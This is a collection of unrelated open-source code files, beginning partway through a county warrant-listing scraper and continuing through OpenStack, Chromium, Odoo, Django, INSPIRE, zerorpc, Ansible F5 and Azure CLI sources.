display_name = '{last}, {first}'.format(first=first_name, last=last_name)
if middle_name:
display_name = display_name + ' {middle}'.format(middle=middle_name)
try:
details = self.process_details(detail_markup)
except Exception as ex:
print('Error processing details for {}:'.format(display_name, ex))
continue
age_span = fname_span.find_next('span').find_next('span').find_next('span')
try:
age = int(age_span.text.strip())
except ValueError:
age = None
street_num_tag = age_span.find_next('span')
street_pred_tag = street_num_tag.find_next('span')
street_name_tag = street_pred_tag.find_next('span')
street_type_tag = street_name_tag.find_next('span')
city_tag = street_type_tag.find_next('span')
race_tag = city_tag.find_next('span')
sex_tag = race_tag.find_next('span')
height_tag = sex_tag.find_next('span')
weight_tag = height_tag.find_next('span')
try:
weight = int(weight_tag.text.strip())
except ValueError:
weight = None
address = '{num} {pred} {name} {type} {city}'.\
format(num=street_num_tag.text.strip(),
pred=street_pred_tag.text.strip(),
name=street_name_tag.text.strip(),
type=street_type_tag.text.strip(),
city=city_tag.text.strip())
yield {
'name': name,
'display_name': display_name,
'last_name': last_name,
'first_name': first_name,
'middle_name': middle_name,
'age': age,
'address': address,
'race': race_tag.text.strip(),
'sex': sex_tag.text.strip(),
'height': height_tag.text.strip(),
'weight': weight,
'warrant': details,
'county': 'onondaga'
}
def run(self, alphabet):
"""Entry Point."""
for a in alphabet:
markup = self.get_list_markup(a)
warrants = self.process_list(markup)
for warrant in warrants:
yield warrant
# Process additional pages
next_page = 0
while self.has_next(markup):
next_page += 1
markup = self.get_next_list_markup(next_page)
next_warrants = self.process_list(markup)
for next_warrant in next_warrants:
yield next_warrant
|
cisco-openstack/tempest | refs/heads/proposed | tempest/api/compute/keypairs/test_keypairs_v22.py | 2 | # Copyright 2016 NEC Corporation. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from tempest.api.compute.keypairs import test_keypairs
from tempest.lib.common.utils import data_utils
from tempest.lib import decorators
class KeyPairsV22TestJSON(test_keypairs.KeyPairsV2TestJSON):
min_microversion = '2.2'
max_microversion = 'latest'
def _check_keypair_type(self, keypair, keypair_type):
if keypair_type is None:
keypair_type = 'ssh'
self.assertEqual(keypair_type, keypair['type'])
def _test_keypairs_create_list_show(self, keypair_type=None):
k_name = data_utils.rand_name('keypair')
keypair = self.create_keypair(k_name, keypair_type=keypair_type)
# Verify whether 'type' is present in keypair create response of
# version 2.2 and it is with default value 'ssh'.
self._check_keypair_type(keypair, keypair_type)
keypair_detail = self.keypairs_client.show_keypair(k_name)['keypair']
self._check_keypair_type(keypair_detail, keypair_type)
fetched_list = self.keypairs_client.list_keypairs()['keypairs']
for keypair in fetched_list:
# Verify whether 'type' is present in keypair list response of
# version 2.2 and it is with default value 'ssh'.
if keypair['keypair']['name'] == k_name:
self._check_keypair_type(keypair['keypair'], keypair_type)
@decorators.idempotent_id('8726fa85-7f98-4b20-af9e-f710a4f3391c')
def test_keypairsv22_create_list_show(self):
self._test_keypairs_create_list_show()
@decorators.idempotent_id('89d59d43-f735-441a-abcf-0601727f47b6')
def test_keypairsv22_create_list_show_with_type(self):
keypair_type = 'x509'
self._test_keypairs_create_list_show(keypair_type=keypair_type)
|
DirtyUnicorns/android_external_chromium_org | refs/heads/lollipop | tools/telemetry/telemetry/web_components/web_component_unittest.py | 45 | # Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import StringIO
import unittest
from telemetry.web_components import web_component
class SimpleWebComponent(web_component.WebComponent):
def __init__(self):
super(SimpleWebComponent, self).__init__(
tvcm_module_name='telemetry.web_components.viewer_unittest_data',
js_class_name='telemetry.web_components.SimpleWebComponent',
data_binding_property='dataToView')
def WriteDataToFileAsJson(self, f):
f.write("1\n")
class WebComponentTests(unittest.TestCase):
def testForSmoke(self):
v = SimpleWebComponent()
f = StringIO.StringIO()
v.WriteWebComponentToFile(f)
def testRead(self):
v = SimpleWebComponent()
f = StringIO.StringIO()
v.WriteWebComponentToFile(f)
f.seek(0)
data = SimpleWebComponent.ReadDataObjectFromWebComponentFile(f)
self.assertEquals(data, 1)
|
rubencabrera/odoo | refs/heads/8.0 | openerp/addons/base/ir/ir_exports.py | 338 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import fields,osv
class ir_exports(osv.osv):
_name = "ir.exports"
_order = 'name'
_columns = {
'name': fields.char('Export Name'),
'resource': fields.char('Resource', select=True),
'export_fields': fields.one2many('ir.exports.line', 'export_id',
'Export ID', copy=True),
}
class ir_exports_line(osv.osv):
_name = 'ir.exports.line'
_order = 'id'
_columns = {
'name': fields.char('Field Name'),
'export_id': fields.many2one('ir.exports', 'Export', select=True, ondelete='cascade'),
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
gannetson/django | refs/heads/master | django/contrib/contenttypes/forms.py | 376 | from __future__ import unicode_literals
from django.contrib.contenttypes.models import ContentType
from django.db import models
from django.forms import ModelForm, modelformset_factory
from django.forms.models import BaseModelFormSet
class BaseGenericInlineFormSet(BaseModelFormSet):
"""
A formset for generic inline objects to a parent.
"""
def __init__(self, data=None, files=None, instance=None, save_as_new=None,
prefix=None, queryset=None, **kwargs):
opts = self.model._meta
self.instance = instance
self.rel_name = '-'.join((
opts.app_label, opts.model_name,
self.ct_field.name, self.ct_fk_field.name,
))
if self.instance is None or self.instance.pk is None:
qs = self.model._default_manager.none()
else:
if queryset is None:
queryset = self.model._default_manager
qs = queryset.filter(**{
self.ct_field.name: ContentType.objects.get_for_model(
self.instance, for_concrete_model=self.for_concrete_model),
self.ct_fk_field.name: self.instance.pk,
})
super(BaseGenericInlineFormSet, self).__init__(
queryset=qs, data=data, files=files,
prefix=prefix,
**kwargs
)
@classmethod
def get_default_prefix(cls):
opts = cls.model._meta
return '-'.join(
(opts.app_label, opts.model_name,
cls.ct_field.name, cls.ct_fk_field.name)
)
def save_new(self, form, commit=True):
setattr(form.instance, self.ct_field.get_attname(),
ContentType.objects.get_for_model(self.instance).pk)
setattr(form.instance, self.ct_fk_field.get_attname(),
self.instance.pk)
return form.save(commit=commit)
def generic_inlineformset_factory(model, form=ModelForm,
formset=BaseGenericInlineFormSet,
ct_field="content_type", fk_field="object_id",
fields=None, exclude=None,
extra=3, can_order=False, can_delete=True,
max_num=None, formfield_callback=None,
validate_max=False, for_concrete_model=True,
min_num=None, validate_min=False):
"""
Returns a ``GenericInlineFormSet`` for the given kwargs.
You must provide ``ct_field`` and ``fk_field`` if they are different from
the defaults ``content_type`` and ``object_id`` respectively.
"""
opts = model._meta
# if there is no field called `ct_field` let the exception propagate
ct_field = opts.get_field(ct_field)
if not isinstance(ct_field, models.ForeignKey) or ct_field.remote_field.model != ContentType:
raise Exception("fk_name '%s' is not a ForeignKey to ContentType" % ct_field)
fk_field = opts.get_field(fk_field) # let the exception propagate
if exclude is not None:
exclude = list(exclude)
exclude.extend([ct_field.name, fk_field.name])
else:
exclude = [ct_field.name, fk_field.name]
FormSet = modelformset_factory(model, form=form,
formfield_callback=formfield_callback,
formset=formset,
extra=extra, can_delete=can_delete, can_order=can_order,
fields=fields, exclude=exclude, max_num=max_num,
validate_max=validate_max, min_num=min_num,
validate_min=validate_min)
FormSet.ct_field = ct_field
FormSet.ct_fk_field = fk_field
FormSet.for_concrete_model = for_concrete_model
return FormSet
|
opendaylight/netvirt | refs/heads/master | resources/tools/odltools/odltools/mdsal/models/constants.py | 1 | VIF_TYPE_TO_PREFIX = {
'ovs': 'tap',
'vhost_user': 'vhu'
}
VIF_TYPE = 'neutron-binding:vif-type'
IFACE_PARENT = 'odl-interface:parent-interface'
IFTYPE_VLAN = 'iana-if-type:l2vlan'
IFTYPE_TUNNEL = 'iana-if-type:tunnel'
|
dset0x/inspire-next | refs/heads/master | inspire/modules/workflows/workflows/process_record_arxiv.py | 1 | # -*- coding: utf-8 -*-
#
## This file is part of INSPIRE.
## Copyright (C) 2014 CERN.
##
## INSPIRE is free software: you can redistribute it and/or modify
## it under the terms of the GNU General Public License as published by
## the Free Software Foundation, either version 3 of the License, or
## (at your option) any later version.
##
## INSPIRE is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with INSPIRE. If not, see <http://www.gnu.org/licenses/>.
##
## In applying this license, CERN does not waive the privileges and immunities
## granted to it by virtue of its status as an Intergovernmental Organization
## or submit itself to any jurisdiction.
"""Workflow for processing single arXiv records harvested."""
import collections
from six import string_types
from invenio.modules.workflows.tasks.marcxml_tasks import (
convert_record_to_bibfield,
quick_match_record,
)
from invenio.modules.classifier.tasks.classification import (
classify_paper_with_oaiharvester,
)
from invenio.modules.oaiharvester.tasks.postprocess import (
convert_record_with_repository,
plot_extract,
arxiv_fulltext_download,
refextract,
author_list,
upload_step,
)
from invenio.modules.workflows.tasks.workflows_tasks import log_info
from inspire.modules.workflows.tasks.actions import was_approved
from invenio.modules.workflows.tasks.logic_tasks import (
workflow_if,
workflow_else,
)
from invenio.modules.workflows.definitions import WorkflowBase
from ..tasks.filtering import inspire_filter_custom
class process_record_arxiv(WorkflowBase):
"""Processing workflow for a single arXiv record.
The records have been harvested via oaiharvester.
"""
object_type = "arXiv"
workflow = [
convert_record_with_repository("oaiarXiv2inspire_nofilter.xsl"),
convert_record_to_bibfield,
workflow_if(quick_match_record, True),
[
plot_extract(["latex"]),
arxiv_fulltext_download,
classify_paper_with_oaiharvester(
taxonomy="HEPont",
output_mode="dict",
),
refextract,
author_list,
inspire_filter_custom(fields=["report_number", "arxiv_category"],
custom_widgeted="*",
custom_accepted="gr",
action="inspire_approval"),
workflow_if(was_approved),
[
upload_step,
],
workflow_else,
[
log_info("Record rejected")
]
],
workflow_else,
[
log_info("Record already into database"),
],
]
@staticmethod
def get_title(bwo):
"""Get the title."""
extracted_title = []
record = bwo.get_data()
if hasattr(record, "get") and "title" in record:
if isinstance(record["title"], str):
extracted_title = [record["title"]]
else:
for a_title in record["title"]:
extracted_title.append(record["title"][a_title])
else:
extracted_title = [" No title"]
title_final = ""
for i in extracted_title:
title_final += "{0} ".format(i)
return title_final
@staticmethod
def get_description(bwo):
"""Get the description column part."""
record = bwo.get_data()
from invenio.modules.records.api import Record
try:
identifiers = Record(record.dumps()).persistent_identifiers
final_identifiers = []
for i in identifiers:
final_identifiers.append(i['value'])
except Exception:
if hasattr(record, "get"):
final_identifiers = [
record.get(
"system_number_external", {}
).get("value", 'No ids')
]
else:
final_identifiers = [' No ids']
task_results = bwo.get_tasks_results()
results = []
if 'bibclassify' in task_results:
try:
result = task_results['bibclassify'][0]['result']
fast_mode = result.get('fast_mode', False)
result = result['dict']['complete_output']
result_string = "<strong></br>Bibclassify result:"\
"</br></strong>"\
"Number of Core keywords: \t%s</br>"\
"PACS: \t%s</br>"\
% (len(result['Core keywords']),
len(result['Field codes']))
if fast_mode:
result_string += "(This task run at fast mode"\
" taking into consideration"\
" only the title and the abstract)"
results.append(result_string)
except (KeyError, IndexError):
pass
categories = []
if hasattr(record, "get"):
if 'subject' in record:
lookup = ["subject", "term"]
elif "subject_term":
lookup = ["subject_term", "term"]
else:
lookup = None
if lookup:
primary, secondary = lookup
category_list = record.get(primary, [])
if isinstance(category_list, dict):
category_list = [category_list]
for subject in category_list:
category = subject[secondary]
if len(subject) == 2:
if subject.keys()[1] == secondary:
source_list = subject[subject.keys()[0]]
else:
source_list = subject[subject.keys()[1]]
else:
try:
source_list = subject['source']
except KeyError:
source_list = ""
if source_list.lower() == 'inspire':
categories.append(category)
from flask import render_template
return render_template('workflows/styles/harvesting_record.html',
categories=categories,
identifiers=final_identifiers,
results=results)
@staticmethod
def formatter(bwo, **kwargs):
"""Return a formatted version of the data."""
from invenio.modules.formatter.engine import format_record
data = bwo.get_data()
if not data:
return ''
formatter = kwargs.get("formatter", None)
format = kwargs.get("format", None)
if formatter:
# A seperate formatter is supplied
return formatter(data)
from invenio.modules.records.api import Record
if isinstance(data, collections.Mapping):
# Dicts are cool on its own, but maybe its SmartJson (record)
try:
data = Record(data.dumps()).legacy_export_as_marc()
except (TypeError, KeyError):
# Maybe not, submission?
return data
if isinstance(data, string_types):
# Its a string type, lets try to convert
if format:
# We can try formatter!
# If already XML, format_record does not like it.
if format != 'xm':
try:
return format_record(recID=None,
of=format,
xml_record=data)
except TypeError:
# Wrong kind of type
pass
else:
# So, XML then
from xml.dom.minidom import parseString
try:
pretty_data = parseString(data)
return pretty_data.toprettyxml()
except TypeError:
# Probably not proper XML string then
return "Data cannot be parsed: %s" % (data,)
except Exception:
# Some other parsing error
pass
# Just return raw string
return data
if isinstance(data, set):
return list(data)
# Not any of the above types. How juicy!
return data
|
shykes/zerorpc-python | refs/heads/master | zerorpc/patterns.py | 1 | # -*- coding: utf-8 -*-
# Open Source Initiative OSI - The MIT License (MIT):Licensing
#
# The MIT License (MIT)
# Copyright (c) 2012 DotCloud Inc ([email protected])
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies
# of the Software, and to permit persons to whom the Software is furnished to do
# so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
class ReqRep():
def process_call(self, context, bufchan, event, functor):
result = context.middleware_call_procedure(functor, *event.args)
bufchan.emit('OK', (result,), context.middleware_get_task_context())
def accept_answer(self, event):
return True
def process_answer(self, context, bufchan, event, method,
raise_remote_error):
result = event.args[0]
if event.name == 'ERR':
raise_remote_error(event)
bufchan.close()
bufchan.channel.close()
bufchan.channel.channel.close()
return result
class ReqStream():
def process_call(self, context, bufchan, event, functor):
xheader = context.middleware_get_task_context()
for result in iter(context.middleware_call_procedure(functor,
*event.args)):
bufchan.emit('STREAM', result, xheader)
bufchan.emit('STREAM_DONE', None, xheader)
def accept_answer(self, event):
return event.name in ('STREAM', 'STREAM_DONE')
def process_answer(self, context, bufchan, event, method,
raise_remote_error):
def iterator(event):
while event.name == 'STREAM':
yield event.args
event = bufchan.recv()
if event.name == 'ERR':
raise_remote_error(event)
bufchan.close()
bufchan.channel.channel.close()
return iterator(event)
patterns_list = [ReqStream(), ReqRep()]
|
gshivani/ansible-modules-extras | refs/heads/devel | network/f5/bigip_pool_member.py | 4 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2013, Matt Hite <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
DOCUMENTATION = '''
---
module: bigip_pool_member
short_description: "Manages F5 BIG-IP LTM pool members"
description:
- "Manages F5 BIG-IP LTM pool members via iControl SOAP API"
version_added: "1.4"
author: '"Matt Hite (@mhite)" <[email protected]>'
notes:
- "Requires BIG-IP software version >= 11"
- "F5 developed module 'bigsuds' required (see http://devcentral.f5.com)"
- "Best run as a local_action in your playbook"
- "Supersedes bigip_pool for managing pool members"
requirements:
- bigsuds
options:
server:
description:
- BIG-IP host
required: true
user:
description:
- BIG-IP username
required: true
password:
description:
- BIG-IP password
required: true
validate_certs:
description:
- If C(no), SSL certificates will not be validated. This should only be used
on personally controlled sites using self-signed certificates.
required: false
default: 'yes'
choices: ['yes', 'no']
version_added: 2.0
state:
description:
- Pool member state
required: true
default: present
choices: ['present', 'absent']
session_state:
description:
- Set new session availability status for pool member
version_added: "2.0"
required: false
default: null
choices: ['enabled', 'disabled']
monitor_state:
description:
- Set monitor availability status for pool member
version_added: "2.0"
required: false
default: null
choices: ['enabled', 'disabled']
pool:
description:
- Pool name. This pool must exist.
required: true
partition:
description:
- Partition
required: false
default: 'Common'
host:
description:
- Pool member IP
required: true
aliases: ['address', 'name']
port:
description:
- Pool member port
required: true
connection_limit:
description:
- Pool member connection limit. Setting this to 0 disables the limit.
required: false
default: null
description:
description:
- Pool member description
required: false
default: null
rate_limit:
description:
- Pool member rate limit (connections-per-second). Setting this to 0 disables the limit.
required: false
default: null
ratio:
description:
- Pool member ratio weight. Valid values range from 1 through 100. New pool members -- unless overriden with this value -- default to 1.
required: false
default: null
'''
EXAMPLES = '''
## playbook task examples:
---
# file bigip-test.yml
# ...
- hosts: bigip-test
tasks:
- name: Add pool member
local_action: >
bigip_pool_member
server=lb.mydomain.com
user=admin
password=mysecret
state=present
pool=matthite-pool
partition=matthite
host="{{ ansible_default_ipv4["address"] }}"
port=80
description="web server"
connection_limit=100
rate_limit=50
ratio=2
- name: Modify pool member ratio and description
local_action: >
bigip_pool_member
server=lb.mydomain.com
user=admin
password=mysecret
state=present
pool=matthite-pool
partition=matthite
host="{{ ansible_default_ipv4["address"] }}"
port=80
ratio=1
description="nginx server"
- name: Remove pool member from pool
local_action: >
bigip_pool_member
server=lb.mydomain.com
user=admin
password=mysecret
state=absent
pool=matthite-pool
partition=matthite
host="{{ ansible_default_ipv4["address"] }}"
port=80
# The BIG-IP GUI doesn't map directly to the API calls for "Pool ->
# Members -> State". The following states map to API monitor
# and session states.
#
# Enabled (all traffic allowed):
# monitor_state=enabled, session_state=enabled
# Disabled (only persistent or active connections allowed):
# monitor_state=enabled, session_state=disabled
# Forced offline (only active connections allowed):
# monitor_state=disabled, session_state=disabled
#
# See https://devcentral.f5.com/questions/icontrol-equivalent-call-for-b-node-down
- name: Force pool member offline
local_action: >
bigip_pool_member
server=lb.mydomain.com
user=admin
password=mysecret
state=present
session_state=disabled
monitor_state=disabled
pool=matthite-pool
partition=matthite
host="{{ ansible_default_ipv4["address"] }}"
port=80
'''
def pool_exists(api, pool):
# hack to determine if pool exists
result = False
try:
api.LocalLB.Pool.get_object_status(pool_names=[pool])
result = True
except bigsuds.OperationFailed, e:
if "was not found" in str(e):
result = False
else:
# genuine exception
raise
return result
def member_exists(api, pool, address, port):
# hack to determine if member exists
result = False
try:
members = [{'address': address, 'port': port}]
api.LocalLB.Pool.get_member_object_status(pool_names=[pool],
members=[members])
result = True
except bigsuds.OperationFailed, e:
if "was not found" in str(e):
result = False
else:
# genuine exception
raise
return result
def delete_node_address(api, address):
result = False
try:
api.LocalLB.NodeAddressV2.delete_node_address(nodes=[address])
result = True
except bigsuds.OperationFailed, e:
if "is referenced by a member of pool" in str(e):
result = False
else:
# genuine exception
raise
return result
def remove_pool_member(api, pool, address, port):
members = [{'address': address, 'port': port}]
api.LocalLB.Pool.remove_member_v2(pool_names=[pool], members=[members])
def add_pool_member(api, pool, address, port):
members = [{'address': address, 'port': port}]
api.LocalLB.Pool.add_member_v2(pool_names=[pool], members=[members])
def get_connection_limit(api, pool, address, port):
members = [{'address': address, 'port': port}]
result = api.LocalLB.Pool.get_member_connection_limit(pool_names=[pool], members=[members])[0][0]
return result
def set_connection_limit(api, pool, address, port, limit):
members = [{'address': address, 'port': port}]
api.LocalLB.Pool.set_member_connection_limit(pool_names=[pool], members=[members], limits=[[limit]])
def get_description(api, pool, address, port):
members = [{'address': address, 'port': port}]
result = api.LocalLB.Pool.get_member_description(pool_names=[pool], members=[members])[0][0]
return result
def set_description(api, pool, address, port, description):
members = [{'address': address, 'port': port}]
api.LocalLB.Pool.set_member_description(pool_names=[pool], members=[members], descriptions=[[description]])
def get_rate_limit(api, pool, address, port):
members = [{'address': address, 'port': port}]
result = api.LocalLB.Pool.get_member_rate_limit(pool_names=[pool], members=[members])[0][0]
return result
def set_rate_limit(api, pool, address, port, limit):
members = [{'address': address, 'port': port}]
api.LocalLB.Pool.set_member_rate_limit(pool_names=[pool], members=[members], limits=[[limit]])
def get_ratio(api, pool, address, port):
members = [{'address': address, 'port': port}]
result = api.LocalLB.Pool.get_member_ratio(pool_names=[pool], members=[members])[0][0]
return result
def set_ratio(api, pool, address, port, ratio):
members = [{'address': address, 'port': port}]
api.LocalLB.Pool.set_member_ratio(pool_names=[pool], members=[members], ratios=[[ratio]])
def set_member_session_enabled_state(api, pool, address, port, session_state):
members = [{'address': address, 'port': port}]
session_state = ["STATE_%s" % session_state.strip().upper()]
api.LocalLB.Pool.set_member_session_enabled_state(pool_names=[pool], members=[members], session_states=[session_state])
def get_member_session_status(api, pool, address, port):
members = [{'address': address, 'port': port}]
result = api.LocalLB.Pool.get_member_session_status(pool_names=[pool], members=[members])[0][0]
result = result.split("SESSION_STATUS_")[-1].lower()
return result
def set_member_monitor_state(api, pool, address, port, monitor_state):
members = [{'address': address, 'port': port}]
monitor_state = ["STATE_%s" % monitor_state.strip().upper()]
api.LocalLB.Pool.set_member_monitor_state(pool_names=[pool], members=[members], monitor_states=[monitor_state])
def get_member_monitor_status(api, pool, address, port):
members = [{'address': address, 'port': port}]
result = api.LocalLB.Pool.get_member_monitor_status(pool_names=[pool], members=[members])[0][0]
result = result.split("MONITOR_STATUS_")[-1].lower()
return result
def main():
argument_spec = f5_argument_spec();
argument_spec.update(dict(
session_state = dict(type='str', choices=['enabled', 'disabled']),
monitor_state = dict(type='str', choices=['enabled', 'disabled']),
pool = dict(type='str', required=True),
host = dict(type='str', required=True, aliases=['address', 'name']),
port = dict(type='int', required=True),
connection_limit = dict(type='int'),
description = dict(type='str'),
rate_limit = dict(type='int'),
ratio = dict(type='int')
)
)
module = AnsibleModule(
argument_spec = argument_spec,
supports_check_mode=True
)
(server,user,password,state,partition,validate_certs) = f5_parse_arguments(module)
session_state = module.params['session_state']
monitor_state = module.params['monitor_state']
pool = fq_name(partition, module.params['pool'])
connection_limit = module.params['connection_limit']
description = module.params['description']
rate_limit = module.params['rate_limit']
ratio = module.params['ratio']
host = module.params['host']
address = fq_name(partition, host)
port = module.params['port']
# sanity check user supplied values
if (host and not port) or (port and not host):
module.fail_json(msg="both host and port must be supplied")
if 1 > port > 65535:
module.fail_json(msg="valid ports must be in range 1 - 65535")
try:
api = bigip_api(server, user, password)
if not pool_exists(api, pool):
module.fail_json(msg="pool %s does not exist" % pool)
result = {'changed': False} # default
if state == 'absent':
if member_exists(api, pool, address, port):
if not module.check_mode:
remove_pool_member(api, pool, address, port)
deleted = delete_node_address(api, address)
result = {'changed': True, 'deleted': deleted}
else:
result = {'changed': True}
elif state == 'present':
if not member_exists(api, pool, address, port):
if not module.check_mode:
add_pool_member(api, pool, address, port)
if connection_limit is not None:
set_connection_limit(api, pool, address, port, connection_limit)
if description is not None:
set_description(api, pool, address, port, description)
if rate_limit is not None:
set_rate_limit(api, pool, address, port, rate_limit)
if ratio is not None:
set_ratio(api, pool, address, port, ratio)
if session_state is not None:
set_member_session_enabled_state(api, pool, address, port, session_state)
if monitor_state is not None:
set_member_monitor_state(api, pool, address, port, monitor_state)
result = {'changed': True}
else:
# pool member exists -- potentially modify attributes
if connection_limit is not None and connection_limit != get_connection_limit(api, pool, address, port):
if not module.check_mode:
set_connection_limit(api, pool, address, port, connection_limit)
result = {'changed': True}
if description is not None and description != get_description(api, pool, address, port):
if not module.check_mode:
set_description(api, pool, address, port, description)
result = {'changed': True}
if rate_limit is not None and rate_limit != get_rate_limit(api, pool, address, port):
if not module.check_mode:
set_rate_limit(api, pool, address, port, rate_limit)
result = {'changed': True}
if ratio is not None and ratio != get_ratio(api, pool, address, port):
if not module.check_mode:
set_ratio(api, pool, address, port, ratio)
result = {'changed': True}
if session_state is not None:
session_status = get_member_session_status(api, pool, address, port)
if session_state == 'enabled' and session_status == 'forced_disabled':
if not module.check_mode:
set_member_session_enabled_state(api, pool, address, port, session_state)
result = {'changed': True}
elif session_state == 'disabled' and session_status != 'force_disabled':
if not module.check_mode:
set_member_session_enabled_state(api, pool, address, port, session_state)
result = {'changed': True}
if monitor_state is not None:
monitor_status = get_member_monitor_status(api, pool, address, port)
if monitor_state == 'enabled' and monitor_status == 'forced_down':
if not module.check_mode:
set_member_monitor_state(api, pool, address, port, monitor_state)
result = {'changed': True}
elif monitor_state == 'disabled' and monitor_status != 'forced_down':
if not module.check_mode:
set_member_monitor_state(api, pool, address, port, monitor_state)
result = {'changed': True}
except Exception, e:
module.fail_json(msg="received exception: %s" % e)
module.exit_json(**result)
# import module snippets
from ansible.module_utils.basic import *
from ansible.module_utils.f5 import *
main()
|
DemokratieInBewegung/abstimmungstool | refs/heads/master | voty/initproc/apps.py | 1 | from django.apps import AppConfig
from django.db.models.signals import post_migrate
from .globals import NOTIFICATIONS
def create_notice_types(sender, **kwargs):
from pinax.notifications.models import NoticeType
print("Creating notices for Initproc")
# Invitations
NoticeType.create(NOTIFICATIONS.INVITE.SEND,
'Einladung zu Initiative',
'Du wurdest zu einer neuen Initiative eingeladen')
NoticeType.create(NOTIFICATIONS.INVITE.ACCEPTED,
'Einladung angenommen',
'Die Einladung wurde angenommen')
NoticeType.create(NOTIFICATIONS.INVITE.REJECTED,
'Einladung abgelehnt',
'Die Einladung wurde abgelehnt')
# Initiative
NoticeType.create(NOTIFICATIONS.INITIATIVE.EDITED,
'Initiative überarbeitet',
'Die Initiative wurde überarbeitet')
NoticeType.create(NOTIFICATIONS.INITIATIVE.SUBMITTED,
'Initiative eingereicht',
'Die Initiative wurde eingereicht')
NoticeType.create(NOTIFICATIONS.INITIATIVE.PUBLISHED,
'Initiative veröffentlicht',
'Die Initiative wurde veröffentlicht')
NoticeType.create(NOTIFICATIONS.INITIATIVE.WENT_TO_DISCUSSION,
'Initiative in Diskussion',
'Die Initiative ist in die Diskussionsphase eingetreten')
NoticeType.create(NOTIFICATIONS.INITIATIVE.DISCUSSION_CLOSED,
'Diskussion zu Initiative beendet',
'Die Initiative kann jetzt final überarbeitet werden')
NoticeType.create(NOTIFICATIONS.INITIATIVE.WENT_TO_VOTE,
'Initiative in Abstimmung',
'Die Initiative ist in die Abstimmung gegangen')
# DISCUSSION
NoticeType.create(NOTIFICATIONS.INITIATIVE.NEW_ARGUMENT,
'Neues Argument in Diskussion zu Initiative',
'Es wurde ein neues Argument in der Diskussion zur Initiative gepostet')
class InitprocConfig(AppConfig):
name = 'voty.initproc'
verbose_name ="Initiative Process"
def ready(self):
post_migrate.connect(create_notice_types, sender=self) |
samedder/azure-cli | refs/heads/master | src/command_modules/azure-cli-consumption/azure/cli/command_modules/consumption/_transformers.py | 5 | # --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
def transform_usage_output(result):
result.usage_start = result.usage_start.strftime("%Y-%m-%dT%H:%M:%SZ")
result.usage_end = result.usage_end.strftime("%Y-%m-%dT%H:%M:%SZ")
result.usage_quantity = str(result.usage_quantity)
result.billable_quantity = str(result.billable_quantity)
result.pretax_cost = str(result.pretax_cost)
if result.meter_details:
result.meter_details.total_included_quantity = str(result.meter_details.total_included_quantity)
result.meter_details.pretax_standard_rate = str(result.meter_details.pretax_standard_rate)
return result
def transform_usage_list_output(result):
return [transform_usage_output(item) for item in result]
|
dkubiak789/odoo | refs/heads/8.0 | addons/mass_mailing/wizard/test_mailing.py | 148 | # -*- coding: utf-8 -*-
from openerp import tools
from openerp.osv import osv, fields
class TestMassMailing(osv.TransientModel):
_name = 'mail.mass_mailing.test'
_description = 'Sample Mail Wizard'
_columns = {
'email_to': fields.char('Recipients', required=True,
help='Comma-separated list of email addresses.'),
'mass_mailing_id': fields.many2one('mail.mass_mailing', 'Mailing', required=True),
}
_defaults = {
'email_to': lambda self, cr, uid, ctx=None: self.pool['mail.message']._get_default_from(cr, uid, context=ctx),
}
def send_mail_test(self, cr, uid, ids, context=None):
Mail = self.pool['mail.mail']
for wizard in self.browse(cr, uid, ids, context=context):
mailing = wizard.mass_mailing_id
test_emails = tools.email_split(wizard.email_to)
mail_ids = []
for test_mail in test_emails:
mail_values = {
'email_from': mailing.email_from,
'reply_to': mailing.reply_to,
'email_to': test_mail,
'subject': mailing.name,
'body_html': '',
'notification': True,
'mailing_id': mailing.id,
}
